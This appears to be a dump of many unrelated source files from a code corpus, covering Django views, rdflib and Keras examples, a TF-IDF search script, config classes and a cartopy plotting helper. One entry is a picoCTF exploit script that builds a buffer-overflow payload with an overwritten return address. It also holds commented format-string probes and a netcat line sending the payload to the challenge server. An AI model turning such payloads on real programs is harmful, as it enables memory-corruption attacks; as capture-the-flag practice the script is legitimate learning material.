plaintext = get_template('intern/email.txt')
htmly = get_template('intern/email.html')
profile_obj = a_models.profile.objects.get(user=request.user)
con = get_connection('django.core.mail.backends.smtp.EmailBackend')
d = {'name':profile_obj.name, 'intern':intern_object.intern, 'field':intern_object.field, 'regno':regno}
subject, from_email, to = 'Regards from Team YUVA', 'YUVA<contact@yuva.net.in>',request.user.email
text_content = plaintext.render(d)
html_content = htmly.render(d)
msg = EmailMultiAlternatives(subject, text_content, from_email, [to])
msg.attach_alternative(html_content, "text/html")
msg.send()
intern_registration_object.save()
messages.success(request, 'You have successfully applied for '+intern_object.intern+' internship in '+intern_object.field+' field.')
return redirect('account:activities')
@login_required
@is_manager
def view_reg(request):
user_set = User.objects.all()
total_list = []
for u in user_set :
try:
p = a_models.profile.objects.get(user = u)
a_data = intern_data.objects.get(user = u)
i = intern_registration.objects.filter(user = u)
#s = a_models.student_info.objects.get(user = u)
data_dict = {'p':p, 'i':i, 'e':u.email, 'n':u.username, 'a':a_data}
total_list.append(data_dict)
except (a_models.profile.DoesNotExist, intern_registration.DoesNotExist, intern_data.DoesNotExist) as e:
pass
return render(request,'intern/list.html', {'list':total_list})
@login_required
@is_manager
def download_list(request):
user_set = User.objects.all()
total_list = []
for u in user_set :
try:
p = a_models.profile.objects.get(user = u)
a_data = intern_data.objects.get(user = u)
i = intern_registration.objects.filter(user = u)
#s = a_models.student_info.objects.get(user = u)
data_dict = {'p':p, 'i':i, 'e':u.email, 'n':u.username, 'a':a_data,'s':s}
total_list.append(data_dict)
except (a_models.profile.DoesNotExist, intern_registration.DoesNotExist, intern_data.DoesNotExist) as e:
pass
response = HttpResponse(content_type='application/csv')
response['Content-Disposition'] = 'attachment; filename=list.csv'
wr = csv.writer(response)
wr.writerow(['Date','Name','Email','Phone','Gender','College','Course','Username','Resume','Resume Link','Days','From','To','SOP','Intern'])
for l in total_list:
date1 = l['a'].updated_at
name = l['p'].name
email = l['e']
phone = l['p'].phone
gender = l['a'].gender
college = l['p'].college
course = l['a'].course
u_name = l['n']
resume = l['a'].resume
resume_link = 'https://yuva.net.in/intern/resume_download/'+str(l['p'].user.id)
days = l['a'].days
from_date = l['a'].from_date
to_date = l['a'].to_date
sop = l['a'].sop
intern = ''
for li in l['i']:
intern = intern+li.code.intern+' - '+li.code.field+' - '+li.reg_no+'|######|'
data_list = [date1, name, email, phone, gender, college, course, u_name, resume,resume_link,days,from_date,to_date,sop, intern]
wr.writerow(data_list)
return response
@login_required
@is_manager
def resume_download(request,path):
#file_path = os.path.join(settings.MEDIA_ROOT, path)
#if os.path.exists(file_path):
# with open(file_path, 'rb') as fh:
# response = HttpResponse(fh.read(), content_type="application/resume.pdf")
# response['Content-Disposition'] = 'inline; filename=' + os.path.basename(file_path)
# return response
#raise Http404
user_obj = User.objects.get(id = path)
p = profile.objects.get(user = user_obj)
file = p.resume
response = HttpResponse(FileWrapper(file), content_type='application/pdf')
response['Content-Disposition'] = 'attachment; filename=resume.pdf'
return response
|
21,936 | 06842703abb5fe97943b5cdaa6fb6aaa31c7055f | import os
import pyperclip
# for i in range(5):
# # i=3
# payload = "%"+str(i)+"\$s \x30\xeb\xff\xff\xff\x7f"
# # payload = "%3\$x \x30\xeb\xff\xff\xff\x7f"
# # payload = "%x"*20 + "BBAACCDD"
# # print(payload)
# # os.system('echo ' + payload)
# payload = "A"*500
# os.system('echo ' + payload +' | ./gauntlet')
# os.system('echo ""')
# 118-120
# break *0x0000000000400727
# break *0x00000000004006bc
# 0x7fffffffdb10
# payload = "A"*120 + "BBBBBB"
payload = "A"*120 + "\x10\xdb\xff\xff\xff\x7f"
pyperclip.copy(payload)
# os.system('./gauntlet')
print(payload)
# print("break *0x000000000040074e")
# print("r")
# print(payload)
# os.system('echo ' + payload +' | nc mercury.picoctf.net 11022')
# 7fffffffeb30
# 41414141414242
# \x30\xeb\xff\xff\xff\x7f
# for ((i = 1; i < 200; i++)); do ./gauntlet; echo "BBAAAACC%$i\$x"; done | grep 4141
# for ((i = 1; i < 200; i++)); do echo -n "$i " && ./gauntlet && echo "" && echo "BBAAAACC%$i\$x"; done | grep 4141
# XYZDCBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
asdlkfjsldkjflskdjflksjdlfkkjbafdkjghdsiluhgoihfiunlmdfndgohdikjrnelkfhjuiobfgsdjfoihsbfoqeifjio8wejflksdfjoishejwenofin
|
21,937 | e9b67397dac3478fcd375e76dfacded1ea91bbde | from rdflib import Graph, BNode, Literal, URIRef
from rdflib import RDF, RDFS
from rdflib.namespace import FOAF, DC, XSD
g = Graph()
donna = BNode()
bob = BNode()
# Add triples using store's add method.
g.add((donna, RDF.type, FOAF.Person))
g.add((donna, FOAF.nick, Literal("donna", lang="foo")))
g.add((donna, FOAF.name, Literal("Donna Fales")))
g.add((donna, FOAF.mbox, URIRef("mailto:donna@example.org")))
for s, p, o in g:
print (s, p, o)
# For each foaf:Person in the store print out its mbox property.
print("--- printing mboxes ---")
for person in g.subjects(RDF.type, FOAF.Person):
for mbox in g.objects(person, FOAF.mbox):
print mbox
# Bind a few prefix, namespace pairs for more readable output
g.bind("dc", DC)
g.bind("foaf", FOAF)
"""
g.subjects(p, o)
g.predicates(s, o)
g.objects(s, p)
"""
for s in g.subjects(None, None):
print s
for p in g.predicates(donna, None):
print p
for o in g.objects(donna, None):
print o
print '~~~~~~~~~~~~~~~~~'
print g.subject_objects(None)
print '~~~~~~~~~~~~~~~~~'
print g.predicate_objects(None)
"""
g.triples(s, p, o)
"""
for s, p, o in g.triples((donna, RDF.type, FOAF.Person)):
print (s, p, o)
"""
g.value(s, p)
"""
name = g.value(donna, FOAF.name)
print name
"""
RDFS.label
"""
from rdflib import ConjunctiveGraph, URIRef, RDFS, Literal
from rdflib.namespace import SKOS
from pprint import pprint
g = ConjunctiveGraph()
u = URIRef(u'http://example.com/foo')
g.add([u, RDFS.label, Literal('foo')])
g.add([u, RDFS.label, Literal('bar')])
pprint(sorted(g.preferredLabel(u)))
g.add([u, SKOS.prefLabel, Literal('bla')])
pprint(g.preferredLabel(u))
g.add([u, SKOS.prefLabel, Literal('blubb', lang='en')])
sorted(g.preferredLabel(u))
pprint(g.preferredLabel(u))
pprint(g.preferredLabel(u))
g.add([u, SKOS.prefLabel, Literal('blubb', lang='en')])
sorted(g.preferredLabel(u))
g.preferredLabel(u, lang='')
pprint(g.preferredLabel(u, lang='en'))
g.serialize("test6.rdf",format="xml")
|
21,938 | be1c163b1e2cba0169e24836f189c88c3df871df | from copy import deepcopy
import numpy as np
from HAPT import split_HAPT
# from utils.load_cifar import load_data
# from models import resnet, densenet, inception, vggnet
from compression import prune_weights, save_compressed_weights
from keras.models import load_model
from numpy.random import seed
from sklearn.metrics import accuracy_score
# def save_history(history, result_dir, prefix):
# loss = history.history['loss']
# acc = history.history['acc']
# val_loss = history.history['val_loss']
# val_acc = history.history['val_acc']
# nb_epoch = len(acc)
#
# with open(os.path.join(result_dir, '{}_result.txt'.format(prefix)), 'w') as fp:
# fp.write('epoch\tloss\tacc\tval_loss\tval_acc\n')
# for i in range(nb_epoch):
# fp.write('{}\t{}\t{}\t{}\t{}\n'.format(
# i, loss[i], acc[i], val_loss[i], val_acc[i]))
#
#
# def schedule(epoch):
# if epoch < 60:
# return 0.1
# elif epoch < 120:
# return 0.01
# elif epoch < 160:
# return 0.001
# else:
# return 0.0001
#
#
# def training():
batch_size = 32
# epochs = 200
fine_tune_epochs = 30
pca_dims = 20
# lr = 0.1
# prune weights
# save masks for weight layers
X_train, X_test, y_train, y_test = split_HAPT.main(pca_dims)
y_train = y_train - 1
# datagen = DataGenerator()
# data_iter = datagen.flow(X_train, y_train, batch_size=batch_size, shuffle=True)
masks = {}
layer_count = 0
moderated = str(50)
model_path = 'model/' + moderated + 'Hz/' + 'pca_testing_bigger_cnn' + str(pca_dims) + '.hdf5'
model = load_model(model_path)
pred_train = model.predict(np.expand_dims(X_train, axis=2), batch_size=32)
# print("------ TRAIN ACCURACY ------")
accuracy = (accuracy_score(y_train, np.argmax(pred_train, axis=1)))
print(accuracy)
seed(2020)
# not compress first convolution layer
first_conv = True
for layer in model.layers:
weight = layer.get_weights()
print(len(weight))
if len(weight) >= 2:
if not first_conv:
w = deepcopy(weight)
tmp, mask = prune_weights(w[0], compress_rate=0.5) # args.compress_rate)
masks[layer_count] = mask
w[0] = tmp
layer.set_weights(w)
else:
first_conv = False
layer_count += 1
# score = model.evaluate(np.expand_dims(X_train, axis=2), y_test, verbose=0)
# print('val loss: {}'.format(score[0]))
# print('val acc: {}'.format(score[1]))
n_classes = 12
# Convert to one hot encoding vector
y_train_dynamic_oh = np.eye(n_classes)[y_train]
# fine-tune
# while accuracy >= 0.91:
# # apply masks
# for layer_id in masks:
# w = model.layers[layer_id].get_weights()
# w[0] = w[0] * masks[layer_id]
# model.layers[layer_id].set_weights(w)
# model.fit(np.expand_dims(X_train, axis=2), y_train_dynamic_oh,
# batch_size=32, epochs=5, verbose=2, validation_split=0.2) # , callbacks=[cp_cb])
# accuracy = (accuracy_score(y_train, np.argmax(pred_train, axis=1)))
# for i in range(fine_tune_epochs):
# for _ in range(X_train.shape[0] // batch_size):
# # X, Y = data_iter.next()
# # train on each batch
# model.train_on_batch(np.expand_dims(X_train, axis=2), y_train_dynamic_oh)
# # apply masks
# for layer_id in masks:
# w = model.layers[layer_id].get_weights()
# w[0] = w[0] * masks[layer_id]
# model.layers[layer_id].set_weights(w)
# score = model.evaluate(X_test, y_test, verbose=0)
# print('val loss: {}'.format(score[0]))
# print('val acc: {}'.format(score[1]))
# save compressed weights
compressed_name = 'compressed_true_0.9_bigs' # .format(args.model)
# model.save('compressed_new.hdf5')
save_compressed_weights(model, compressed_name)
# if __name__ == '__main__':
# pca_dims = 30
# moderated = str(50)
#
# training()
# model_path = 'compressed.hdf5'
# model = load_model('compressed_new.hdf5')
#
# seed(2020)
# X_train, X_test, y_train, y_test = split.main(pca_dims)
#
# y_train = y_train - 1
# y_test = y_test - 1
# print(moderated)
#
# pred_train = model.predict(np.expand_dims(X_train, axis=2), batch_size=32)
# print("------ TRAIN ACCURACY ------")
# print((accuracy_score(y_train, np.argmax(pred_train, axis=1))))
# # print((confusion_matrix(y_train, np.argmax(pred_train, axis=1))))
#
# pred_test = model.predict(np.expand_dims(X_test, axis=2), batch_size=32)
# print("------ TEST ACCURACY ------")
# print((accuracy_score(y_test, np.argmax(pred_test, axis=1))))
# # print((confusion_matrix(y_test, np.argmax(pred_test, axis=1))))
|
21,939 | 56bb3f98de7ac828f0a298ebd8bd010bb57509b1 | import math
class Config:
SHAPES = {
'cylinder': {
'dimensions': ['height', 'radius'],
'volume_func': lambda h, r: math.pi*r*r*h,
'area_func': lambda h, r: 2 * math.pi*r*(r + h)
},
'cone': {
'dimensions': ['height', 'radius'],
'volume_func': lambda h, r: math.pi*r*r*h / 3,
'area_func': lambda h, r: math.pi*r*(r + math.sqrt(h*h + r*r))
},
'cuboid': {
'dimensions': ['length', 'breadth', 'height'],
'volume_func': lambda l, b, h: l*b*h,
'area_func': lambda l, b, h: 2 * (l*b + b*h + l*h)
}
}
MATERIALS = {
'iron': {
'price': 2
},
'steel': {
'price': 1
}
}
COATINGS = {
'gold': {
'price': 1000
},
'silver': {
'price': 100
},
'copper': {
'price': 10
}
}
class DevConfig(Config):
pass
class TestConfig(Config):
TESTING = True
class ProdConfig(Config):
DEBUG = False
configs = {
'development': DevConfig,
'testing': TestConfig,
'production': ProdConfig
}
|
21,940 | 3e554ed7aef4980c22bdd0e4badbb909eef83ff6 | # coding: utf-8
from datetime import datetime
now = datetime.now()
print('INICIANDO A ANГЃLISE DE DADOS...')
print('Este procedimento requer alguns minutos, por favor aguarde!')
print('')
print('')
Total = 0
# Abrir o arquivo de registros Г serem pesquisados
data = open('testlist.txt','r')
for linha in data:
linha = linha.rstrip()
data2 = open('VPN_RJ1.txt','r')
for linha2 in data2:
linha2 = linha2.rstrip()
if linha in linha2:
Total = Total + 1
print('Este terminal Г© comum no GOL2 e GOL3 ' + linha)
print('')
print('O total de terminais comuns encontrados foi')
print(Total)
print('')
print('ANГЃLISE CONCLUГЌDA COM SUCESSO!')
|
21,941 | 885edb12340b45d173d757bb04397e4db3f64e7e | # This software is Copyright (c) 2015 The Regents of the University of
# California. All Rights Reserved. Permission to copy, modify, and distribute this
# software and its documentation for academic research and education purposes,
# without fee, and without a written agreement is hereby granted, provided that
# the above copyright notice, this paragraph and the following three paragraphs
# appear in all copies. Permission to make use of this software for other than
# academic research and education purposes may be obtained by contacting:
#
# Office of Innovation and Commercialization
# 9500 Gilman Drive, Mail Code 0910
# University of California
# La Jolla, CA 92093-0910
# (858) 534-5815
# invent@ucsd.edu
#
# This software program and documentation are copyrighted by The Regents of the
# University of California. The software program and documentation are supplied
# "as is", without any accompanying services from The Regents. The Regents does
# not warrant that the operation of the program will be uninterrupted or
# error-free. The end-user understands that the program was developed for research
# purposes and is advised not to rely exclusively on the program for any reason.
#
# IN NO EVENT SHALL THE UNIVERSITY OF CALIFORNIA BE LIABLE TO ANY PARTY FOR
# DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES, INCLUDING LOST
# PROFITS, ARISING OUT OF THE USE OF THIS SOFTWARE AND ITS DOCUMENTATION, EVEN IF
# THE UNIVERSITY OF CALIFORNIA HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH
# DAMAGE. THE UNIVERSITY OF CALIFORNIA SPECIFICALLY DISCLAIMS ANY WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
# FITNESS FOR A PARTICULAR PURPOSE. THE SOFTWARE PROVIDED HEREUNDER IS ON AN "AS
# IS" BASIS, AND THE UNIVERSITY OF CALIFORNIA HAS NO OBLIGATIONS TO PROVIDE
# MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR MODIFICATIONS.
from grip.common import ACTIVE_MAX_PFX_EVENTS, ACTIVE_MAX_EVENT_ASES, ACTIVE_MAX_PROBES_PER_TARGET
class TracerouteMetrics:
"""metrics and extra information collected for each event"""
def __init__(self,
max_pfx_events=ACTIVE_MAX_PFX_EVENTS, max_event_ases=ACTIVE_MAX_EVENT_ASES, max_vps_per_event_as=ACTIVE_MAX_PROBES_PER_TARGET,
tr_worthy=False, tr_worthy_tags=None, tr_skipped=False, tr_skip_reason="",
selected_vp_cnt=0, selected_unique_vp_cnt=0, total_event_as_cnt=0, selected_event_as_cnt=0,
tr_worthy_pfx_event_cnt=0, selected_pfx_event_cnt=0,
tr_request_cnt=0, tr_request_failure_cnt=0,
):
# thresholds
self.max_pfx_events = max_pfx_events # how many prefixes are we willing to trace per event?
self.max_event_ases = max_event_ases # how many prefixes are we willing to trace per event?
self.max_vps_per_event_as = max_vps_per_event_as # how many prefixes are we willing to trace per event?
# event-level
self.tr_worthy = tr_worthy
self.tr_skipped = tr_skipped
if tr_worthy_tags is None:
tr_worthy_tags = []
self.tr_worthy_tags = set()
for tags in tr_worthy_tags:
self.tr_worthy_tags.add(tuple(tags))
self.tr_skip_reason = tr_skip_reason
self.selected_vp_cnt = selected_vp_cnt
self.selected_unique_vp_cnt = selected_unique_vp_cnt
self.total_event_as_cnt = total_event_as_cnt
self.selected_event_as_cnt = selected_event_as_cnt
# pfx_event-level
self.tr_worthy_pfx_event_cnt = tr_worthy_pfx_event_cnt
self.selected_pfx_event_cnt = selected_pfx_event_cnt
self.tr_request_cnt = tr_request_cnt
self.tr_request_failure_cnt = tr_request_failure_cnt
def update_tags(self, pfx_events):
for e in pfx_events:
if e.traceroutes["worthy"]:
self.tr_worthy_tags.add(tuple(e.traceroutes["worthy_tags"]))
@staticmethod
def from_dict(d):
return TracerouteMetrics(**d)
|
21,942 | ba50cac4ca57263bbdc01bc75f391a3a5f33712d | from __future__ import division
import operator
import math
from collections import OrderedDict
import textwrap
from collection import *
from nlp import *
import csv
def getTfDoc(list_of_terms):
for filename in list_of_filenames:
data = getDocument(filename, sub_dir)
# print('data : ', data)
nlp_list = nlp(data)
# print('data : ', nlp_list)
for term in nlp_list:
if term in list_of_terms:
# if list_of_terms.has_key(term):
if ids[filename] in list_of_terms[term]:
# if list_of_terms[term].has_key(ids[filename]):
list_of_terms[term][ids[filename]] = list_of_terms[term][ids[filename]] + 1
else:
list_of_terms[term].update({ids[filename]: 1})
else:
list_of_terms.update({term: {ids[filename]: 1}})
return list_of_terms
def getTfQuery(list_of_terms):
for word in query:
if word in list_of_query:
# if list_of_terms[term].has_key(ids[filename]):
list_of_terms[word] = list_of_terms[word] + 1
else:
list_of_terms.update({word: 1})
return list_of_terms
def getWeightDocs(tfidf_scores, list_of_terms):
for term, value in list_of_terms.items():
# print('value item ', value)
for docID, frequency in value.items():
# print('docID value item ',value)
# print('inside ', total_documents,'/',len(value))
idf_value = math.log10(float(total_documents / len(value)))
tfidf = idf_value * frequency
if term in inverse_term_freq:
# print('idf : ', inverse_term_freq)
if docID in inverse_term_freq[term]:
# print('idf with doc id : ', inverse_term_freq[term][docID])
inverse_term_freq[term][docID] = idf_value
tfidf_scores[term][docID] = tfidf
else:
inverse_term_freq[term].update({docID: idf_value})
tfidf_scores[term].update({docID: tfidf})
else:
inverse_term_freq.update({term: {docID: idf_value}})
tfidf_scores.update({term: {docID: tfidf}})
return tfidf_scores
def getWeightQuery(tfidf_scores, list_of_terms):
for term, value in list_of_terms.items():
for docID, idf in inverse_term_freq[term].items():
tfidf_scores.update({term: inverse_term_freq[term][docID] * value})
return tfidf_scores
def getDistanceDocs(tfidf, distance_dict):
sum = 0
for term, value in tfidf.items():
for docID, weight in value.items():
if docID in docs_dict:
docs_dict[docID][term] = weight
else:
docs_dict.update({docID: {term: weight}})
# print('ini docID', docs_dict)
for doc, words in docs_dict.items():
for word, values in words.items():
sum = sum + math.pow(float(values), 2)
distance = math.sqrt(sum)
distance_dict.update({doc: distance})
sum = 0
return distance_dict
def getDistanceQuery(tfidf):
sum = 0
for word, value in tfidf.items():
sum = sum + math.pow(float(value), 2)
distance = math.sqrt(sum)
return distance
sub_dir = "data"
query = input("query : ")
print('')
query = nlp(query)
print('The query is "', query, '"')
# initial dict
list_of_docs = {}
list_of_query = {}
total_documents = 0
inverse_term_freq = {}
tfidf_docs = {}
tfidf_query = {}
distance_query = 0
distance_docs = {}
docs_dict = {}
# collect all the filenames
list_of_filenames = findall(sub_dir)
# print ('list file ',list_of_filenames)
total_documents = len(list_of_filenames)
# print ('total document ',len(list_of_filenames))
# assign them ids
ids = assignids(list_of_filenames)
# print('id : ', ids)
# calculate tf-idf (weight) document & query
list_of_docs.update(getTfDoc(list_of_docs))
list_of_query.update(getTfQuery(list_of_query))
# print('list of term ', list_of_query, 'and ', list_of_docs)
tfidf_docs.update(getWeightDocs(tfidf_docs, list_of_docs))
tfidf_query.update(getWeightQuery(tfidf_query, list_of_query))
# print('idf doc', inverse_term_freq)
print('===================== CALCULATION =====================')
print('query weight', tfidf_query)
print('doc weight', tfidf_docs)
# get distance query & document
distance_query = (getDistanceQuery(tfidf_query))
distance_docs.update(getDistanceDocs(tfidf_docs, distance_docs))
print('distance query ', distance_query)
print('distance docs ', distance_docs)
# get inner pproduct
inner_product = {}
sum_ip = 0
for docID, values in docs_dict.items():
for word, value in tfidf_query.items():
if word in values:
# print('bangsul ', docs_dict[docID])
# print('ini value ', values[word])
sum_ip = sum_ip + float(value * values[word])
inner_product.update({docID: sum_ip})
# print('hilih kintil ',sum_ip)
sum_ip = 0
# for docID, ip in inner_product.items():
# print(getFilenameById(docID, ids))
for docID, score in inner_product.items():
if score > 0 :
print('dot product ',getFilenameById(docID,ids),' ', inner_product[docID])
print("=========================================================\n")
# get similarity (tfidf)
similarity = {}
for docID, value in inner_product.items():
for doc, values in distance_docs.items():
if docID == doc:
# print('calculate ',value,'/',distance_query,'*',distance_docs[doc])
calculate = value / float(distance_query * distance_docs[doc])
# print('perhitungan ',value,'/','float(',distance_query,'*',distance_docs[docID],')')
similarity.update({getFilenameById(docID, ids): calculate})
calculate = 0
sorted_similarity = OrderedDict(sorted(similarity.items(), key=lambda x: x[1], reverse=True))
print('')
print("========= Displaying results in relevance order =========")
for docID, score in sorted_similarity.items():
if score > 0:
print(docID,' : ',similarity[docID])
try:
with open('result-tf.csv', 'w') as csv_file:
writer = csv.writer(csv_file)
for key, value in similarity.items():
writer.writerow([key, value])
except IOError:
print('I/O error')
print("\n")
extract = []
for doc, score in sorted_similarity.items():
extract.append(getDocument(doc,sub_dir))
print("========================================== EXTRACTED TEXT ==========================================")
print('\n',textwrap.fill(extract[0], 100))
print("====================================================================================================")
# if getFilenameById(docID,ids) in list_of_filenames:
# extract = getDocument(getFilenameById(docID,ids),sub_dir)
# print('extracted text', extract)
|
21,943 | c8c9b4297e99c201b4404b7b7c68c75d27fe5a45 | # @lc app=leetcode id=264 lang=python3
#
# [264] Ugly Number II
#
# @lc tags=math;dynamic-programming;heap
# @lc imports=start
from imports import *
# @lc imports=end
# @lc idea=start
#
#
#
# @lc idea=end
# @lc group=
# @lc rank=
# @lc code=start
class Solution:
def nthUglyNumber(self, n: int) -> int:
pass
# @lc code=end
# @lc main=start
if __name__ == '__main__':
print('Example 1:')
print('Input : ')
print('n = 10')
print('Exception :')
print('12')
print('Output :')
print(str(Solution().nthUglyNumber(10)))
print()
print('Example 2:')
print('Input : ')
print('n = 1')
print('Exception :')
print('1')
print('Output :')
print(str(Solution().nthUglyNumber(1)))
print()
pass
# @lc main=end |
21,944 | 3b5e4272b458a6b37eae2e3c113c2aa6391f1ee0 | n, m = int(input()), list(map(int, input().split()))
print(all([True if x>0 else False for x in m]) and any([str(x)==str(x)[::-1] for x in m])) |
21,945 | d06a9b9af73d8765626e9687bda60702e68ca033 | #!/usr/bin/env python3
"""
Preprocessing the database
"""
# import pandas as pd
def preprocessing(name_file):
"""
Function to clean tha data from csv
Arguments:
- name_file is the name of the file that contains the data
Returns:
- train is the train values
- validation is the validation values
- test is the test values
"""
db_data = pd.read_csv(name_file).dropna()
db_data['Timestamp'] = pd.to_datetime(db_data['Timestamp'], unit='s')
db_data = db_data[db_data['Timestamp'].dt.year >= 2017]
db_data.reset_index(inplace=True, drop=True)
db_data = db_data.drop(['Timestamp'], axis=1)
db_data = db_data[0::60]
n = len(db_data)
# Split data
train = db_data[0:int(n * 0.7)]
validation = db_data[int(n * 0.7):int(n * 0.9)]
test = db_data[int(n * 0.9):]
# Normalize data
train_mean = train.mean()
train_std = train.std()
train = (train - train_mean) / train_std
validation = (validation - train_mean) / train_std
test = (test - train_mean) / train_std
return train, validation, test
|
21,946 | 50a59aa08f4d54ceccad7c513aadd293d1d2675d | import tensorflow as tf
from tensorflow.keras.losses import Loss
class PointLoss(Loss):
"""Computes sparse softmax cross entropy between `logits` and `labels`.
To it the l2 loss of the orthogonal matrix of the feature transform
is added.
"""
def __init__(self, ft) -> None:
self.ft = ft
self.rw = 0.001
def __call__(self, y_true, y_pred, sample_weight=None):
cce = tf.keras.losses.SparseCategoricalCrossentropy(reduction=tf.keras.losses.Reduction.NONE)
cl = cce(y_true, y_pred)
cl = tf.math.reduce_mean(cl)
md = tf.linalg.matmul(self.ft, tf.transpose(self.ft, perm=[0,2,1]))
md -= tf.eye(self.ft.shape[1])
md = tf.nn.l2_loss(md)
return cl + md * self.rw
|
21,947 | 386cbe1db55cb4fbee189104113d68d67e58fe52 | import os
import sqlite3
import csv
from typing import List
DB_NAME = 'user_account_app.db'
class Database:
def __init__(self):
if os.path.exists(DB_NAME):
os.remove(DB_NAME)
self.create_user_table()
self.insert_user_rows_from_csv()
def create_user_table(self) -> None:
query_str = """
CREATE TABLE user(
id INTEGER PRIMARY KEY AUTOINCREMENT,
email TEXT UNIQUE,
first_name TEXT,
last_name TEXT,
password TEXT,
phone_number INTEGER,
is_admin INTEGER,
invitation_code TEXT)
"""
self.execute(query_str=query_str)
def get_connection(self) -> sqlite3.Connection:
return sqlite3.connect(DB_NAME)
def insert_user_rows_from_csv(self):
conn = self.get_connection()
cur = conn.cursor()
with open('user.csv', 'r') as fp:
dr = csv.DictReader(fp)
to_db = [
(i['email'], i['first_name'], i['last_name'], i['password'],
i['phone_number'], i['is_admin'], i['invitation_code']) for i in dr]
cur.executemany(
"""
INSERT INTO user
(email, first_name, last_name, password,
phone_number, is_admin, invitation_code)
VALUES (?, ?, ?, ?, ?, ?, ?)""",
to_db)
conn.commit()
conn.close()
def execute(self, query_str) -> bool:
try:
conn = self.get_connection()
cur = conn.cursor()
cur.execute(query_str)
conn.commit()
conn.close()
return True
except Exception as e:
print(e)
return False
def select(self, query_str: str) -> List[tuple]:
conn = self.get_connection()
cur = conn.cursor()
cur.execute(query_str)
rows = cur.fetchall()
conn.close()
return rows
def select_one(self, query_str: str) -> tuple:
conn = self.get_connection()
cur = conn.cursor()
cur.execute(query_str)
row = cur.fetchone()
conn.close()
return row
|
21,948 | c447d79b2faa387c8c3ddacc108c8a0f29d36b8f | "Useful functions for 3D plots"
import numpy as np
import mpl_toolkits.mplot3d.axes3d as ax3d
from .utils import grab_current_axis
from .angle_utils import cartesian_to_latitude_longitude
import cartopy.crs as ccrs
from matplotlib.collections import PatchCollection
import matplotlib.pyplot as plt
from collections.abc import Iterable
LAEA = ccrs.LambertAzimuthalEqualArea(central_latitude=90)
TRANSFORM = ccrs.PlateCarree()
@grab_current_axis
def plot_faces(faces, face_colors=None, edge_colors=None, ax=None, **kwargs):
"""Plot a list of faces using Poly3DCollection.
Parameters
----------
faces: list
List of the coordinates of the faces to plot, each element of `faces`
is a numpy array with shape (n_points, 3).
face_colors: color or sequence of colors (default: None)
Set the facecolor(s) of the collection. face_colors can be a color (all
patches have same color), or a sequence of colors; if it is a sequence
the patches will cycle through the sequence.
edge_colors: color or sequence of colors or 'face'
The collection edgecolor(s). If a sequence, the patches cycle
through it. If 'face', match the facecolor.
ax: mplot3d.axes3d.Axes3D
Axis to use fort the plot, by default grab the current axis.
**kwargs:
Additional key-word arguments that will be passed to Poly3DCollection.
Returns
-------
tri: mplot3d.art3d.Poly3DCollection
The resulting matplotlib Poly3DCollection.
"""
tri = ax3d.art3d.Poly3DCollection(faces, **kwargs)
if face_colors is not None:
tri.set_facecolor(face_colors)
if edge_colors is not None:
tri.set_edgecolor(edge_colors)
ax.add_collection3d(tri)
return tri
@grab_current_axis
def fill_projected_faces(lat_face_all, lon_face_all,
face_colors=None, edge_colors=None,
ax=None, **kwargs):
"""Plot a list of faces from geographic coordinates using a LAEA projection
The faces are plotted as a matplotlib PatchCollection, each one of the
patches being genereted using matplotlib's `fill` function.
Parameters
----------
lat_face_all: array, shape = (n_faces, n_vertices)
The latitudes of the `n_faces` vertices for the `n_faces` faces in deg
lon_face_all: array, shape = (n_faces, n_vertices)
The longitudes of the `n_faces` vertices for the `n_faces` faces in deg
face_colors: string, iterable of len n_faces or None (default: None)
The color for the faces, if face_colors is an iterable of length
`n_faces`, each element of face_colors is passed to `plt.fill` color.
Else, face_colors is used for generating each patch of the
PatchCollection.
ax: matplotlib axis (default: None)
Matplotlib axis with a cartopy LambertAzimuthalEqualArea projection. If
None is provided (default), the current axis is grabed.
**kwargs
Additional key-word arguments passed to matplotlib's fill function for
each facet.
Returns
-------
patch_collection: matplotlib PatchCollection
The resulting PatchCollection
Notes
-----
The patches overlapping the south pole and the prime meridian are ignored
due to rendering issue. The criterion for ignoring such facets is having
one vertex with latitude inferior to -85 deg and one vertex whose longitude
has an absolute value inferior to 5 deg.
Example:
-------
import matplotlib.pyplot as plt
import numpy as np
import angle_visualization
from angle_visualization.angle_utils import cartesian_to_latitude_longitude
from angle_visualization.triangulation import Delaunay_Sphere
import cartopy.crs as ccrs
# Generate the sphere faces
n_points = 300
d = Delaunay_Sphere(n_points)
latlon_face_all = np.array([cartesian_to_latitude_longitude(f, deg=True) for f in d.faces]) # noqa E501
random_colors = [np.random.choice(["r","g","b"]) for _ in d.faces]
# Create a figure and axis with Lambert Azimuthal Equal Area projection
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1, projection=angle_visualization.LAEA)
ax.gridlines()
# Fill the faces of the triangulated sphere
angle_visualization.fill_projected_faces(latlon_face_all[:, 0, :],
latlon_face_all[:, 1, :],
face_colors = random_colors,
alpha=.3)
# Add a scatterplot of all points
lat, lon = cartesian_to_latitude_longitude(d._points, deg=True)
ax.scatter(lon, lat, transform=ccrs.PlateCarree())
"""
# Replicate the input face_color if needed
n_faces = len(lat_face_all)
if kwargs.get("facecolor") is not None:
face_colors = [kwargs.get("facecolor")] * n_faces
elif kwargs.get("fc") is not None:
face_colors = [kwargs.get("fc")] * n_faces
elif face_colors is None or (isinstance(face_colors, Iterable) and len(face_colors)) != n_faces: # noqa 501
face_colors = [face_colors] * n_faces
# Replicate the edge color if needed or use the face color
if kwargs.get("ec") is not None:
edge_colors = [kwargs.get("ec")] * n_faces
elif kwargs.get("edgecolor") is not None:
edge_colors = [kwargs.get("edgecolor")] * n_faces
elif isinstance(edge_colors, Iterable) and len(edge_colors) != n_faces:
edge_colors = [edge_colors] * n_faces
elif edge_colors is None:
edge_colors = face_colors
# Remove the parsed colors
kwargs.pop("facecolor", None)
kwargs.pop("edgecolor", None)
kwargs.pop("fc", None)
kwargs.pop("ec", None)
# Loop over the coordinates of the faces
patches = [] # list of patches that will be converted to a PatchCollection
for face_idx, (lat, lon) in enumerate(zip(lat_face_all, lon_face_all)):
# Remove the points with longitude 0 at the south pole
if not (np.any(lat <= -85) and np.any(np.abs(lon) <= 5)):
